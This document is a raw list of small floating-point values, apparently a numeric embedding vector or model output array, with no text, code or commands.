-0.003656693734228611, 0.00017714628484100103, 0.0281929112970829, -0.011022037826478481, 0.03505839407444, -0.01050605159252882, 0.007374302484095097, 0.002563806250691414, 0.00684039993211627, 0.005335440393537283, -0.01034838892519474, -0.003930811304599047, 0.00964607484638691, 0.0003650423022918403, 0.009954232722520828, 0.0104415537789464, 0.023764029145240784, 0.003977393265813589, 0.013480138964951038, -0.0255269818007946, -0.023907359689474106, -0.007947620004415512, -0.0030869590118527412, 0.0014207535423338413, -0.028665898367762566, -0.00691923126578331, 0.022889720275998116, 0.019191818311810493, 0.009947066195309162, -0.027633925899863243, -0.008965259417891502, -0.007288304623216391, 0.00778995780274272, -0.006320830434560776, 0.009180254302918911, -0.03250712901353836, 0.009466912597417831, -0.006141668651252985, 0.01374529767781496, -0.01190351415425539, 0.023248042911291122, 0.017758524045348167, -0.00831311009824276, 0.005926674231886864, -0.00017009179282467812, -0.012419500388205051, 0.009767904877662659, 0.007481799460947514, 0.024394679814577103, 0.009337916038930416, -0.03402642160654068, 0.0026247212663292885, 0.020209457725286484, -0.009237585589289665, -0.003138915868476033, -0.012412333860993385, -0.01879049651324749, 0.0046116262674331665, 0.010943206958472729, 0.010807043872773647, 0.01917748525738716, -0.009087089449167252, 0.0009952441323548555, 0.0029275049455463886, 0.015336255542933941, -0.01183901634067297, -0.005475186742842197, 0.0031174165196716785, 0.010957539081573486, -0.00013034025323577225, 0.004206720739603043, 0.006883398629724979, 0.016654886305332184, -0.005754678975790739, 0.0004275249957572669, 0.0074746329337358475, 0.018002184107899666, -0.035889703780412674, -0.030959170311689377, -0.005048781167715788, -0.009925567544996738, 0.012684660032391548, -0.013637800700962543, 0.0006987312808632851, 0.000868935021571815, 0.008642768487334251, -0.004102806560695171, 0.007291887886822224, 0.0014467320870608091, -0.017873186618089676, 0.013623467646539211, 0.011688520200550556, -0.0025799309369176626, -0.016554556787014008, 0.00809094961732626, -0.02475300244987011, -0.011624021455645561, -0.013408473692834377, -0.03244979679584503, 0.006969396490603685, -0.0018829911714419723, 0.02558431401848793, -0.014117955230176449, 0.01542225293815136, -0.004016809165477753, -0.01492059975862503, -0.005045197904109955, -0.018905159085989, 0.013128980994224548, -0.005052364431321621, 0.0043034679256379604, 0.005231526214629412, 0.005313940811902285, -0.002069319598376751, 0.006292164791375399, -0.03115983121097088, -0.0047191232442855835, -0.005518185440450907, 0.016898546367883682, -0.009760738350450993, 0.007875955663621426, 0.039960261434316635, -0.004991449415683746, 0.00011768694821512327, 0.04061957821249962, -0.024538008496165276, 0.00952424481511116, -0.031962476670742035, -0.006603906396776438, -0.01482026930898428, 0.012104175053536892, 0.02743326500058174, -0.004547127988189459, 0.028594233095645905, -0.014963598921895027, 0.004486212972551584, 0.011695686727762222, -0.01854683645069599, 0.00574392918497324, 0.01202534418553114, -0.01734286919236183, 0.006095086690038443, 0.010169227607548237, 0.006342330016195774, -0.021571088582277298, 0.0014404613757506013, -0.0186614990234375, -0.01752919703722, -0.012777823954820633, -0.02241673320531845, 0.006435493938624859, -0.004342883359640837, 0.01098620519042015, 0.006489242892712355, -0.01936381496489048, -0.00028621108504012227, -0.025856640189886093, -0.011022037826478481, -0.03236379846930504, 0.012412333860993385, -0.00034914168645627797, 0.0023649365175515413, -0.007431634236127138, 0.013874294236302376, -0.008148281835019588, -0.006424744613468647, -0.0010561591479927301, -0.0037731488700956106, 0.003877062816172838, 0.0011645520571619272, 0.01853250339627266, -0.016841216012835503, -0.005704513750970364, -0.0036083199083805084, -0.021814748644828796, 0.03505839407444, -0.014834602363407612, 0.016009904444217682, -0.023692363873124123, 0.02258872799575329, 0.0046976241283118725, 0.024423345923423767, 0.017414532601833344, 0.02323370985686779, -0.0323924645781517, -0.006793817970901728, -0.006811733823269606, -0.024165352806448936, 0.0061990004032850266, 0.00026829488342627883, 0.002216232242062688, 0.03654902055859566, -0.02106943540275097, -0.012942653149366379, 0.004751372616738081, -0.007531964685767889, -0.03560304641723633, -0.021413424983620644, 0.0050057824701070786, -0.0007054498419165611, -0.0075606307946145535, -0.008098116144537926, 0.00032450692378915846, -0.011831849813461304, -0.02373536303639412, 0.028651565313339233, -0.0024670588318258524, 0.014261283911764622, 0.023334041237831116, -0.010642214678227901, 0.03021385706961155, 0.022130073979496956, 0.007130641955882311, -0.0026766781229525805, -0.018073849380016327, 0.026386959478259087, 0.007703959941864014, -0.01180318370461464, 0.0015667704865336418, -0.008377608843147755, -0.0017728066304698586, 0.0017298078164458275, 0.006299331318587065, 0.007058977615088224, -0.00434646662324667, 0.007198723498731852, -0.01903415657579899, 0.016153233125805855, 0.0038376471493393183, -0.0002792685409076512, 0.036606352776288986, -0.009287751279771328, 0.0025817223358899355, -0.012806490063667297, 0.007911788299679756, 0.016869880259037018, -0.008535271510481834, 0.00819128006696701, -0.01428278349339962, -0.01307881623506546, 0.0057869283482432365, -0.002092610578984022, -0.0007847289671190083, -0.02736159972846508, -0.0022574395406991243, 0.0013974625617265701, 0.001550645916722715, 0.018876492977142334, -0.002705344231799245, -0.012684660032391548, -0.02880922704935074, 0.012240338139235973, 0.0009594117873348296, 0.0004129681037738919, 0.007947620004415512, 0.01221883948892355, -0.01795918494462967, 0.019263483583927155, -0.0028665896970778704, -0.012476831674575806, -0.007603629492223263, 0.02513999305665493, 0.011093702167272568, 0.02025245688855648, -0.0041959709487855434, -0.0071091428399086, -0.0016814341070130467, 0.0007712918450124562, 0.02716093882918358, 0.0013759630965068936, -0.008420608006417751, 0.009029758162796497, 0.005962506867945194, -0.007883122190833092, 0.022818055003881454, 0.02832190692424774, -0.02360636740922928, 0.02984119951725006, -0.004640292376279831, -0.013093149289488792, 0.003751649521291256, 0.006618238985538483, -0.009853902272880077, -0.011086535640060902, -0.006990896072238684, -0.012190173380076885, 0.018948158249258995, -0.004554294515401125, 0.03167581558227539, 0.02481033466756344, 0.00695148017257452, -0.029052887111902237, 0.0051096961833536625, 0.006525075063109398, -0.017228204756975174, 0.016912879422307014, -0.02799224853515625, -0.02253139577805996, -0.01031972374767065, 0.015092595480382442, 0.02069677785038948, 0.005378439091145992, -0.02830757386982441, 0.028536900877952576, 0.014834602363407612, 0.013637800700962543, 0.0062706652097404, 0.014275616966187954, -0.014053456485271454, 0.015307589434087276, 0.008112449198961258, -0.0026390543207526207, -0.018575502559542656, 0.008047950454056263, 0.008907928131520748, 0.003416616702452302, 0.0016644137213006616, -0.01625356450676918, -0.00041699924622662365, -0.014562276192009449, -0.002836132189258933, 0.0011914264177903533, 0.026945944875478745, 0.006019838619977236, 0.008492272347211838, -0.013530303724110126, -0.0034381160512566566, -0.006929981056600809, -0.0027895502280443907, 0.02330537512898445, -0.00793328694999218, 0.029024221003055573, -0.024151019752025604, -0.0037623990792781115, -0.014325782656669617, -0.007689627353101969, 0.028264574706554413, 0.01929214969277382, -0.025799307972192764, 0.007531964685767889, 0.01960747502744198, 0.01834617555141449, 0.020610781386494637, -0.028780560940504074, -0.008657101541757584, 0.030959170311689377, 0.0246383398771286, 0.010943206958472729, -0.018575502559542656, -0.011724351905286312, 0.005636432208120823, -0.0034703651908785105, 0.0040239752270281315, 0.009359415620565414, -0.011394694447517395, -0.007076893467456102, -0.006317247170954943, 0.01431861612945795, -0.014297116547822952, -0.012175840325653553, 0.020524783059954643, 0.005310357548296452, 0.00015329537563957274, -0.0034506574738770723, 0.005235109478235245, -0.021341761574149132, 0.0253263209015131, -0.023792695254087448, -0.022072741761803627, -0.009997231885790825, 0.018561169505119324, -0.03242113068699837, 0.003581445664167404, 0.006431910675019026, 0.022144407033920288, 0.0009096943540498614, -0.013114647939801216, -0.011738684959709644, 0.00012261389929335564, 0.00676156859844923, 0.019836802035570145, -0.004672541283071041, -0.012326336465775967, 0.019148819148540497, -0.010427220724523067, 0.0011260323226451874, -0.006568073760718107, -0.007202306762337685, 0.02425134927034378, -0.013157647103071213, 0.005812010727822781, 0.016468558460474014, -0.022173071280121803, -0.001082137692719698, 0.006077170372009277, 0.015364921651780605, -0.009818069636821747, -0.0022341483272612095, -0.012383667752146721, 0.00936658214777708, 0.02049611695110798, 0.0012505498016253114, -0.011989511549472809, 0.007259638514369726, 0.0030905420426279306, -0.005858592689037323, -0.0016482891514897346, 0.008943759836256504, 0.004522045608609915, -0.005127612501382828, -0.0035975701175630093, -0.006965813226997852, -0.010742545127868652, -0.010104728862643242, -0.02582797408103943, -0.008012118749320507, -0.009015425108373165, 0.02182908169925213, 0.0035850289277732372, -0.002560222987085581, -0.007033894769847393, 0.012498331256210804, -0.012734824791550636, 0.027218271046876907, -0.005428604315966368, 0.02138476073741913, -0.011136701330542564, 0.01929214969277382, 0.004264052491635084, -0.030185190960764885, 0.014053456485271454, 0.00857110321521759, -0.0005110591882839799, -0.016869880259037018, -0.02184341475367546, 0.034370411187410355, -0.008707266300916672, -0.0017226412892341614, -0.007883122190833092, 0.018116846680641174, -0.01840350590646267, 0.009896901436150074, 0.007539131212979555, 0.005321107339113951, -0.005650765262544155, -0.00687264883890748, 0.011516524478793144, 0.004855286329984665, 0.003715817118063569, -0.006668404676020145, -0.0012639869237318635, -0.02234506793320179, 0.016611887142062187, -0.005181360989809036, -0.004883952438831329, -0.012734824791550636, 0.006335163488984108, -0.01636822707951069, -0.003945144359022379, 0.010276724584400654, -0.007725459523499012, -0.005944590549916029, -0.013257977552711964, -0.011466358788311481, -0.022015409544110298, -0.0013965667458251119, -0.039444275200366974, -0.015837907791137695, -0.02082577534019947, -0.0006190042477101088, 0.012777823954820633, 0.01183901634067297, 0.032908450812101364, 0.02836490608751774, 0.004783621523529291, 0.006044921465218067, 0.004909034818410873, 0.0111080352216959, 0.0031335409730672836, -0.015221592038869858, 0.003952310886234045, -0.006546574644744396, 0.008477939292788506, 0.009739238768815994, -0.0018301383825019002, -0.01783018931746483, -0.007653794717043638, -0.02195807732641697, 0.013953126035630703, 0.007101976312696934, 0.0030117109417915344, -0.0032517877407372, -0.009309249930083752, -0.03027118742465973, -0.00593384075909853, 0.0018005766905844212, -0.017787190154194832, -0.007467466406524181, -0.028536900877952576, -0.003550988156348467, 0.017543530091643333, 0.014082122594118118, -0.003877062816172838, 0.010943206958472729, 0.012526997365057468, -0.027261268347501755, 0.017672525718808174, -0.01047021895647049, 0.010670880787074566, 0.0426548570394516, 0.024151019752025604, 0.0076967934146523476, 0.01580924354493618, 0.008563936688005924, -0.013795463368296623, -0.004353633150458336, 0.00034735005465336144, 0.0017817646730691195, 0.010957539081573486, 0.00041028065606951714, -0.0021535255946218967, -0.0008671433897688985, 0.003959476947784424, 0.019707804545760155, 0.009481245651841164, 0.003040376817807555, 0.011760184541344643, 0.004131472669541836, -0.0031263744458556175, -0.007832956500351429, 0.018690165132284164, -0.014232618734240532, -0.00824861228466034, 0.014175286516547203, 0.007015978451818228, 0.006138085387647152, 0.02845090441405773, -0.0009110380779020488, -0.0006561803165823221, -0.007524798158556223, 0.02673094905912876, -0.016138900071382523, 0.021055102348327637, -0.014834602363407612, 0.014340115711092949, 0.03130315989255905, -0.017729857936501503, -0.008578269742429256, 0.008671434596180916, -0.026128966361284256, -0.0021123182959854603, 0.012928320094943047, -0.0051132794469594955, 0.002816424472257495, -0.026616286486387253, 0.0017745982622727752, 0.021284429356455803, -0.008485105820000172, -0.019249150529503822, 0.016468558460474014, 0.003380784299224615, -0.006055670790374279, 0.004815870895981789, 0.015321922488510609, -0.018202845007181168, -0.00904409121721983, -0.003905728692188859, -0.023334041237831116, 0.005468020215630531, 0.015665913000702858, 0.004866036120802164, 0.016525890678167343, 0.014031956903636456, -0.0024993079714477062, 0.013437139801681042, 0.014031956903636456, 0.00926625169813633, -0.0015631872229278088, 0.009567243047058582, 0.02506832778453827, -0.004550711251795292, 0.004167304839938879, -0.005489519331604242, 0.000498517882078886, -0.002135609509423375, -0.02138476073741913, -0.020983437076210976, 0.01266316045075655, -0.004597293213009834, -0.0028020916506648064, -0.0260143019258976, 0.010936040431261063, -0.005812010727822781, -0.012032510712742805, -0.000010819697308761533, -0.0039164782501757145, 0.0028504652436822653, -0.004977116361260414, 0.003518739016726613, -0.015135593712329865, 0.022431064397096634, 0.014590942300856113, 0.011695686727762222, 0.002646220615133643, -0.009244752116501331, -0.02475300244987011, -0.004640292376279831, 0.02456667460501194, 0.0125413304194808, 0.004206720739603043, -0.005826343782246113, 0.024853333830833435, 0.009581576101481915, 0.006241999100893736, -0.0011385736288502812, -0.006679154466837645, 0.015192925930023193, 0.015035263262689114, 0.01573757827281952, -0.0029955862555652857, 0.01942114531993866, -0.013394140638411045, 0.0013499846681952477, 0.0288808923214674, -0.019822468981146812, 0.018575502559542656, 0.0016160400118678808, -0.013558969832956791, -0.0006413994706235826, -0.002262814436107874, -0.00291138025932014, 0.010563383810222149, 0.024523675441741943, 0.02069677785038948, -0.014777270145714283, -0.010721045546233654, -0.010900207795202732, -0.0028916725423187017, -0.022932717576622963, 0.006116585806012154, 0.02127009630203247, 0.01412512082606554, 0.025598647072911263, -0.012648827396333218, -0.000023892913304734975, -0.01771552488207817, 0.006929981056600809, -0.020467450842261314, 0.001327589387074113, 0.007947620004415512, 0.018303176388144493, 0.013415640220046043, 0.005450103897601366, -0.0017109957989305258, -0.008549603633582592, 0.007961953058838844, -0.005973256658762693, -0.00038519801455549896, -0.0033521184232085943, 0.015350588597357273, 0.012906820513308048, 0.002583513967692852, 0.002488558180630207, 0.0006145251682028174, 0.0007712918450124562, -0.008958092890679836, -0.012749157845973969, -0.010642214678227901, 0.00039370820741169155, -0.008004952222108841, 0.0018211803399026394, -0.007453133352100849, 0.010455885902047157, 0.016239231452345848, -0.002784175332635641, -0.001734286779537797, 0.014447612687945366, -0.0025566397234797478, 0.005722430068999529, -0.012290503829717636, 0.003862729761749506, 0.008413441479206085, 0.016353894025087357, -0.0018113264814019203, 0.003534863470122218, -0.00008829320722725242, 0.02227340266108513, -0.014067789539694786, 0.011351695284247398, 0.002124859718605876, 0.0024151019752025604, -0.009130088612437248, 0.010670880787074566, 0.029052887111902237, 0.04704073816537857, -0.006009088829159737, -0.015837907791137695, -0.028149912133812904, 0.010527551174163818, 0.008549603633582592, -0.01092170737683773, -0.019707804545760155, 0.012584329582750797, 0.00687264883890748, -0.0009880777215585113, 0.007689627353101969, -0.00479437131434679, 0.009775071404874325, -0.02114110067486763, 0.0031890810932964087, -0.0022968549747020006, -0.03806831315159798, 0.0003699692606460303, 0.017156539484858513, 0.02806391380727291, 0.0037695656064897776, 0.005450103897601366, -0.002868381328880787, -0.024552341550588608, -0.007961953058838844, -0.01891949214041233, 0.009094255976378918, -0.022803721949458122, -0.000424613623181358, -0.01828884333372116, 0.0036602767650038004, -0.012999984435737133, 0.008019285276532173, -0.002262814436107874, 0.010111895389854908, -0.02405068837106228, -0.02730426751077175, 0.020596448332071304, -0.004038308281451464, -0.014189619570970535, -0.0328797847032547, -0.005729596596211195, -0.014375947415828705, 0.0016805382911115885, -0.016353894025087357, -0.0023900193627923727, 0.013100315816700459, 0.00665048835799098, -0.012140007689595222, 0.009065589867532253, 0.010706712491810322, -0.01269899308681488, -0.026501622051000595, -0.009767904877662659, 0.012806490063667297, -0.039071619510650635, 0.010771211236715317, 0.00933074951171875, -0.012519830837845802, -0.019664805382490158, 0.0009809111943468451, 0.0009656824404373765, -0.003210580674931407, 0.006704236846417189, -0.008965259417891502, -0.012075509876012802, -0.003905728692188859, -0.00238106120377779, -0.008907928131520748, 0.006564490497112274, -0.016210565343499184, 0.0018247636035084724, 0.008821929804980755, -0.03021385706961155, -0.03136049211025238, 0.008857762441039085, -0.005016532260924578, -0.030643844977021217, 0.0019421145552769303, 0.006449826993048191, -0.016038570553064346, 0.006962229963392019, 0.018647165969014168, -0.010556217283010483, 0.00790462177246809, -0.018761830404400826, -0.006188250612467527, 0.03273645415902138, -0.005579100456088781, -0.017686858773231506, 0.0013553594471886754, 0.0036871512420475483, 0.0013894002186134458, -0.03967360407114029, 0.007754125632345676, 0.005575517192482948, -0.01625356450676918, -0.007058977615088224, -0.002753717824816704, 0.010104728862643242, -0.011975178495049477, 0.009273418225347996, 0.010498885065317154, -0.014834602363407612, -0.009674740955233574, -0.021126767620444298, 0.009517078287899494, -0.007338469848036766, 0.004561461042612791, 0.01930648274719715, 0.02170008420944214, 0.003590403823181987, 0.0077756247483193874, -0.013343975879251957, 0.022001076489686966, 0.0038878123741596937, -0.005726013332605362, -0.005726013332605362, 0.007503299042582512, -0.017242537811398506, 0.010498885065317154, 0.009087089449167252, 0.0025458901654928923, 0.010527551174163818, 0.0063064973801374435, -0.007983452640473843, 0.03680701181292534, -0.0045901271514594555, -0.004400215577334166, 0.0008469877066090703, 0.016998877748847008, -0.01549391821026802, 0.010097562335431576, -0.00442529795691371, 0.007481799460947514, 0.010950373485684395, -0.005675847642123699, -0.006016255356371403, 0.016482891514897346, 0.0014440446393564343, 0.0065035754814744, 0.0032177469693124294, 0.01636822707951069, -0.0025763476733118296, -0.016712218523025513, -0.012612994760274887, 0.004074140917509794, 0.0031174165196716785, 0.005987589247524738, -0.02882356010377407, -0.007517631631344557, 0.018374839797616005, -0.017629526555538177, -0.011652687564492226, 0.015450919046998024, 0.01808818243443966, -0.0058944253250956535, -0.0036943175364285707, -0.008907928131520748, -0.009216086007654667, -0.017113540321588516, -0.014411780051887035, 0.011667020618915558, 0.026358293369412422, 0.012777823954820633, -0.01152369100600481, 0.005020115524530411, -0.02006612904369831, 0.0022072740830481052, -0.011710019782185555, 0.0035330718383193016, 0.012605828233063221, -0.02850823476910591, 0.011072203516960144, -0.020281122997403145, -0.02051045000553131, -0.015049596317112446, 0.013107482343912125, 0.009918401017785072, 0.003534863470122218, 0.003898562164977193, -0.008033618330955505, 0.0012344252318143845, -0.0017934102797880769, 0.024409012869000435, 0.004400215577334166, -0.0024598923046141863, -0.02266039326786995, -0.019693471491336823, 0.0024383929558098316, 0.009251918643712997, 0.010197892785072327, 0.0001666205353103578, -0.02723260223865509, 0.0054429373703897, 0.002863006666302681, 0.017242537811398506, -0.008399108424782753, -0.002443767851218581, -0.0315038226544857, -0.02736159972846508, -0.000035384466173127294, -0.013050150126218796, 0.018188511952757835, 0.011430527083575726, -0.012641660869121552, -0.004934117663651705, 0.014569442719221115, -0.0013625259744003415, 0.011509357951581478, -0.03141782432794571, 0.011179700493812561, -0.01955014280974865, -0.002160692121833563, -0.023090381175279617, 0.011874848045408726, -0.0048051211051642895, 0.0060915034264326096, 0.026831280440092087, 0.0026283045299351215, 0.000281955988612026, -0.021155431866645813, -0.006879815366119146, -0.0014933141646906734, 0.007983452640473843, -0.0244376789778471, -0.005618515890091658, -0.002714302157983184, 0.007725459523499012, -0.002812841208651662, -0.025469649583101273, -0.01795918494462967, -0.017371533438563347, -0.0029131718911230564, -0.01649722456932068, -0.009115755558013916, 0.025426652282476425, -0.007976286113262177, -0.009825236164033413, -0.01917748525738716, -0.005568350665271282, -0.017944851890206337, 0.004446797538548708, 0.01784452237188816, 0.003945144359022379, -0.01719953864812851, -0.018045183271169662, -0.015565582551062107, 0.002914963522925973, -0.001492418348789215, 0.0001236216921824962, 0.01333680935204029, 0.016898546367883682, 0.015880906954407692, 0.019822468981146812, -0.01076404470950365, -0.002768050879240036, 0.005629265680909157, 0.03477173298597336, 0.025240322574973106, 0.0030421684496104717, 0.011946513317525387, 0.005335440393537283, 0.00280030001886189, 0.0030009611509740353, -0.003649527207016945, 0.01904848963022232, -0.005837093573063612, -0.03184781223535538, -0.019664805382490158, -0.019636139273643494, 0.000993452500551939, -0.02030978910624981, -0.008793264627456665, 0.020367121323943138, -0.0005930257611908019, -0.010154894553124905, 0.021599754691123962, 0.00175757787656039, 0.0037982314825057983, -0.012483998201787472, 0.008993925526738167, -0.004016809165477753, -0.0027268435806035995, 0.009610242210328579, 0.0033557016868144274, 0.015336255542933941, -0.020840108394622803, -0.00078383315121755, 0.03351043537259102, -0.014139453880488873, -0.0222160704433918, -0.0065824068151414394, 0.0024312264285981655, -0.017686858773231506, -0.025598647072911263, 0.00706256041303277, 0.01936381496489048, -0.013157647103071213, 0.025225989520549774, -0.015350588597357273, 0.01190351415425539, 0.00952424481511116, 0.0027752171736210585, 0.021685751155018806, -0.00042842081165872514, -0.007202306762337685, 0.004335717298090458, 0.014648273587226868, -0.019464144483208656, 0.011960846371948719, -0.014834602363407612, -0.019019823521375656, -0.023018715903162956, -0.009825236164033413, -0.029468543827533722, 0.01606723666191101, 0.011122368276119232, 0.003787481691688299, -0.02190074697136879, -0.013515970669686794, -0.012863821350038052, 0.02449500933289528, -0.00774695910513401, 0.008879262022674084, 0.011774517595767975, -0.013659300282597542, 0.0010015148436650634, -0.005826343782246113, 0.004292718134820461, -0.002820007735863328, -0.01955014280974865, 0.006077170372009277, -0.01142336055636406, -0.021886413916945457, 0.002963337115943432, -0.024022022262215614, -0.0020119876135140657, 0.0012989235110580921, -0.021943744271993637, -0.026644952595233917, 0.008205613121390343, -0.009287751279771328, 0.0042031374759972095, -0.027590926736593246, -0.003633402520790696, -0.016081569716334343, -0.011710019782185555, 0.007026728242635727, -0.007825789973139763, -0.018317509442567825, -0.014633940532803535, -0.01034838892519474, -0.010642214678227901, -0.013931626453995705, -0.017113540321588516, -0.011480691842734814, 0.0005930257611908019, 0.006740069482475519, -0.016110233962535858, -0.02938254550099373, -0.01942114531993866, -0.01454077661037445, -0.0059768399223685265, 0.018432172015309334, -0.02082577534019947, 0.008549603633582592, -0.006449826993048191, -0.0017889312002807856, -0.009810904040932655, 0.026515955105423927, -0.012648827396333218, 0.004367966204881668, 0.046754080802202225, 0.011394694447517395, -0.01942114531993866, 0.007445966824889183, -0.040906235575675964, 0.0075821299105882645, 0.021356094628572464, -0.014354448765516281, 0.0031657901126891375, -0.0010185352293774486, -0.018131179735064507, -0.00001794417948985938, 0.002626512898132205, 0.0024598923046141863, 0.012398000806570053, 0.03434174507856369, 0.017084876075387, 0.015106928534805775, -0.00996856577694416, 0.011287197470664978, -0.019435478374361992, 0.016024237498641014, 0.0038053980097174644, -0.016081569716334343, -0.0123191699385643, -0.018460838124155998, 0.006141668651252985, -0.009567243047058582, -0.003006336046382785, -0.000008328227522724774, 0.0072775548323988914, 0.004489796236157417, -0.018303176388144493, -0.003538446733728051, 0.015164259821176529, -0.010943206958472729, 0.019449811428785324, -0.022330734878778458, 0.0017396616749465466, -0.03224913403391838, 0.022144407033920288, -0.008277278393507004, 0.013945959508419037, -0.002886297646909952, -0.010040231049060822, -0.01707054302096367, -0.030070526525378227, 0.016009904444217682, 0.0029328796081244946, 0.012856654822826385, 0.01120120007544756, 0.0000059312374105502386, -0.01923481747508049, -0.010685213841497898, -0.0108858747407794, 0.017744190990924835, 0.003672818187624216, 0.03041451796889305, 0.012233171612024307, 0.027017608284950256, -0.006464160047471523, 0.006227666512131691, -0.013809796422719955, 0.014268450438976288, 0.004525628872215748, -0.009918401017785072, -0.007890288718044758, 0.001376858912408352, -0.0032482044771313667, 0.01069954689592123, 0.006134502124041319, 0.014519277028739452, -0.01606723666191101, -0.0031353326048702, -0.012512664310634136, 0.01476293709129095, 0.010556217283010483, -0.023190710693597794, 0.0026999693363904953, 0.00687264883890748, -0.008614102378487587, 0.012347836047410965, 0.026573287323117256, -0.007617962546646595, 0.008771765045821667, -0.006983729545027018, 0.007005228661000729, 0.01412512082606554, -0.029927197843790054, -0.008649935014545918, 0.0248819999396801, 0.020553449168801308, -0.000826384115498513, 0.014719938859343529, -0.0011502191191539168, -0.005844260100275278, -0.01038422156125307, 0.0259713027626276, -0.004213886801153421, -0.020238123834133148, -0.007703959941864014, -0.00930208433419466, -0.015952572226524353, -0.01092170737683773, -0.00608075363561511, -0.025096993893384933, 0.021671418100595474, -0.02019512467086315, 0.013587635941803455, -0.026644952595233917, 0.029869865626096725, 0.008155448362231255, 0.03749499469995499, 0.03147515654563904, 0.0056077660992741585, -0.0046976241283118725, 0.027562260627746582, 0.005260192323476076, -0.01031972374767065, 0.01930648274719715, -0.027089273557066917, 0.008563936688005924, -0.00974640529602766, 0.006417578086256981, -0.014433279633522034, 0.011824683286249638, 0.002587097231298685, 0.0045901271514594555, 0.011165367439389229, 0.0106637142598629, -0.009982898831367493, 0.0036441523116081953, 0.01860416866838932, 0.025369320064783096, 0.010735378600656986, 0.016081569716334343, -0.00404547480866313, -0.00948841217905283, -0.011710019782185555, -0.020008796826004982, 0.018303176388144493, -0.008657101541757584, -0.005794094875454903, 0.006295748054981232, -0.013064483180642128, -0.008012118749320507, 0.009631741791963577, -0.00771112646907568, 0.02094043791294098, 0.008563936688005924, -0.009925567544996738, 0.008298777043819427, -0.014691272750496864, -0.010620715096592903, -0.018432172015309334, -0.007754125632345676, -0.004253302700817585, -0.006643321830779314, -0.003289411775767803, 0.0036280276253819466, 0.023706696927547455, -0.01860416866838932, 0.0030117109417915344, 0.0014476279029622674, 0.012906820513308048, -0.0007538235513493419, 0.0018059515859931707, 0.0010704920860007405, -0.018374839797616005, -0.01168135367333889, -0.006786651443690062, -0.02703194133937359, 0.007245305925607681, 0.0026408459525555372, -0.00646057678386569, -0.006077170372009277, -0.004826620686799288, 0.022302068769931793, -0.017500530928373337, -0.014748604968190193, -0.014949265867471695, 0.00793328694999218, -0.014934932813048363, -0.0008456439827568829, 0.0005621203454211354, 0.026186298578977585, -0.03953027352690697, -0.008047950454056263, -0.01632522977888584, 0.03084450587630272, 0.019077155739068985, 0.015407919883728027, 0.019062822684645653, -0.016855547204613686, 0.008012118749320507, -0.0065824068151414394, -0.011014871299266815, -0.0046152095310389996, 0.009158754721283913, 0.01152369100600481, -0.0023506036959588528, -0.010391388088464737, 0.00964607484638691, 0.01507826242595911, -0.023921692743897438, 0.01206117682158947, 0.00401322590187192, -0.01492059975862503, 0.0009701614617370069, 0.02266039326786995, -0.006456993520259857, 0.03130315989255905, 0.009309249930083752, 0.014074956066906452, 0.03927227854728699, -0.026200631633400917, 0.0033127027563750744, 0.0035850289277732372, -0.008743098936975002, 0.005912341643124819, 0.014340115711092949, -0.011659854091703892, 0.0066934870555996895, 0.0003890052030328661, -0.021915078163146973, 0.008499438874423504, 0.002015570877119899, -0.005242276005446911, -0.013824129477143288, 0.007804290857166052, -0.014354448765516281, -0.019965797662734985, 0.010412887670099735, -0.032851118594408035, 0.018016517162322998, -0.0014028373407199979, -0.004296301398426294, -0.010033064521849155, -0.01632522977888584, 0.004758539143949747, -0.0035133641213178635, -0.0018686582334339619, -0.021227097138762474, -0.009674740955233574, 0.0005267358501441777, 0.01040572114288807, 0.020711110904812813, -0.004923367872834206, 0.02019512467086315, 0.00453637819737196, -0.00007703960000071675, 0.012842322699725628, 0.018561169505119324, -0.010828543454408646, 0.0010301807196810842, -0.004962783772498369, 0.016224898397922516, -0.015436585992574692, -0.010448720306158066, 0.003210580674931407, -0.017858853563666344, -0.02304738201200962, -0.007682460825890303, -0.017887519672513008, 0.0014162745792418718, -0.011932180263102055, -0.01701321080327034, 0.013723799027502537, -0.016597554087638855, -0.0011878431541845202, 0.008864928968250751, -0.002710718894377351, 0.009216086007654667, 0.0076752942986786366, -0.010341222397983074, 0.001829242566600442, 0.004518462345004082, 0.01440461352467537, -0.009796570986509323, -0.006847566459327936, 0.007918953895568848, 0.038555633276700974, -0.0016769550275057554, -0.0061990004032850266, 0.018503837287425995, -0.01047021895647049, -0.022316401824355125, -0.0008008535369299352, 0.014311449602246284, 0.0007359073497354984, -0.0022950635757297277, -0.0008210092200897634, -0.02170008420944214, -0.0034416993148624897, -0.007112726103514433, -0.026960277929902077, -0.005761845503002405, 0.0215280894190073, -0.004471879918128252, 0.017228204756975174, -0.00503086531534791, 0.00044141002581454813, 0.038440968841314316, 0.006929981056600809, 0.03210580721497536, 0.002578139305114746, -0.01879049651324749, -0.00126577855553478, -0.014705605804920197, -0.010635048151016235, 0.005292441230267286, 0.006833233404904604, 0.0018955324776470661, 0.010355555452406406, 0.0007269492489285767, 0.003518739016726613, 0.011659854091703892, -0.022115740925073624, -0.020725443959236145, -0.005349773447960615, 0.00763229513540864, -0.0034703651908785105, -0.01523592509329319, 0.005242276005446911, 0.011609688401222229, -0.006399661768227816, -0.013910126872360706, 0.00525302579626441, 0.0127634909003973, -0.007947620004415512, 0.007524798158556223, -0.018933825194835663, 0.02158542163670063, -0.02582797408103943, -0.01492059975862503, 0.007531964685767889, -0.0018704498652368784, -0.00484095374122262, -0.012097008526325226, -0.021427758038043976, -0.002875547856092453, 0.008391941897571087, -0.006740069482475519, 0.022517062723636627, 0.017615193501114845, 0.01618189923465252, 0.008657101541757584, -0.01126569788902998, 0.014146620407700539, -0.008915094658732414, 0.014010457322001457, 0.006331580225378275, -0.0031586235854774714, 0.0043966323137283325, -0.0037803153973072767, -0.015665913000702858, 0.003787481691688299, 0.0017011419404298067, 0.0019958631601184607, 0.004428881220519543, 0.003242829814553261, -0.0019403229234740138, -0.011050703935325146, 0.0004214782966300845, 0.00017938581004273146, 0.003230288391932845, 0.03193381056189537, 0.0021033603698015213, -0.004152971785515547, 0.02525465562939644, 0.017873186618089676, -0.008879262022674084, -0.023377040401101112, 0.007395801600068808, -0.016984544694423676, -0.010233725421130657, 0.005765428766608238, -0.014963598921895027, -0.015092595480382442, -0.0013284852029755712, -0.0025924721267074347, 0.010111895389854908, 0.014605275355279446, 0.02106943540275097, -0.006184667348861694, -0.02297571673989296, 0.010011564940214157, 0.019822468981146812, 0.003413033438846469, 0.0028468819800764322, -0.02215874008834362, -0.014067789539694786, -0.00204065372236073, 0.008585436269640923, 0.022015409544110298, -0.02634396031498909, 0.0019009073730558157, -0.02880922704935074, -0.0038053980097174644, -0.02068244479596615, -0.008771765045821667, -0.021098101511597633, -0.0031371242366731167, 0.025555647909641266, 0.00990406796336174, 0.002732218476012349, 0.0025584313552826643, 